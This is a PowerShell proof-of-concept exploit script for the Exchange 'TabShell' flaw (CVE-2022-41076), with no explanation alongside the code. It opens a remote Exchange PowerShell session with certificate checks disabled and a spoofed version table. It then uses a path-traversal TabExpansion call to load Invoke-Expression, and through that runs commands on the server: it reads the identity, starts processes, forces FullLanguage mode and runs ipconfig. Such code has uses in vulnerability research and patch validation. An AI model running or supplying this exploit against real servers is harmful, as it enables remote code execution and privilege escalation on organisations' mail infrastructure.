■ ■ ■ ■ ■ ■
TabShell_CVE-2022-41076_poc.ps1
| 1 | + | $secureString = ConvertTo-SecureString -String "Pwd" -AsPlainText -Force |
| 2 | + | $UserCredential = New-Object System.Management.Automation.PSCredential -ArgumentList "lab\john", $secureString |
| 3 | + | $version = New-Object -TypeName System.Version -ArgumentList "2.0" |
| 4 | + | $mytable = $PSversionTable |
| 5 | + | $mytable["WSManStackVersion"] = $version |
| 6 | + | $sessionOption = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck -ApplicationArguments @{PSversionTable=$mytable} |
| 7 | + | $Session = New-PSSession -ConfigurationName Microsoft.Exchange -ConnectionUri http://exchange.lab.local/powershell -Credential $UserCredential -Authentication Kerberos -AllowRedirection -SessionOption $sessionOption |
| 8 | + | |
| 9 | + | |
| 10 | + | Invoke-Command -Session $Session -ScriptBlock { TabExpansion -line ";../../../../Windows/Microsoft.NET/assembly/GAC_MSIL/Microsoft.PowerShell.Commands.Utility/v4.0_3.0.0.0__31bf3856ad364e35/Microsoft.PowerShell.Commands.Utility.dll\Invoke-Expression" -lastWord "-test" } |
| 11 | + | |
| 12 | + | |
| 13 | + | Invoke-Command $session {Microsoft.PowerShell.Commands.Utility\Invoke-Expression "[System.Security.Principal.WindowsIdentity]::GetCurrent().Name" } |
| 14 | + | |
| 15 | + | Invoke-Command $session {Microsoft.PowerShell.Commands.Utility\Invoke-Expression "[Diagnostics.Process]::Start('mspaint.exe')" } |
| 16 | + | |
| 17 | + | Invoke-Command $session {Microsoft.PowerShell.Commands.Utility\Invoke-Expression "(new-object System.Diagnostics.Process)::Start('mspaint.exe')" } |
| 18 | + | |
| 19 | + | invoke-expression "`$ExecutionContext.SessionState.LanguageMode" |
| 20 | + | |
| 21 | + | invoke-expression "`$ExecutionContext.SessionState.LanguageMode='FullLanguage'" |
| 22 | + | |
| 23 | + | |
| 24 | + | $ps = new-object System.Diagnostics.Process |
| 25 | + | $ps.StartInfo.Filename = "ipconfig.exe" |
| 26 | + | $ps.StartInfo.Arguments = " /all" |
| 27 | + | $ps.StartInfo.RedirectStandardOutput = $True |
| 28 | + | $ps.StartInfo.UseShellExecute = $false |
| 29 | + | $ps.start() |
| 30 | + | $ps.WaitForExit() |
| 31 | + | [string] $Out = $ps.StandardOutput.ReadToEnd(); |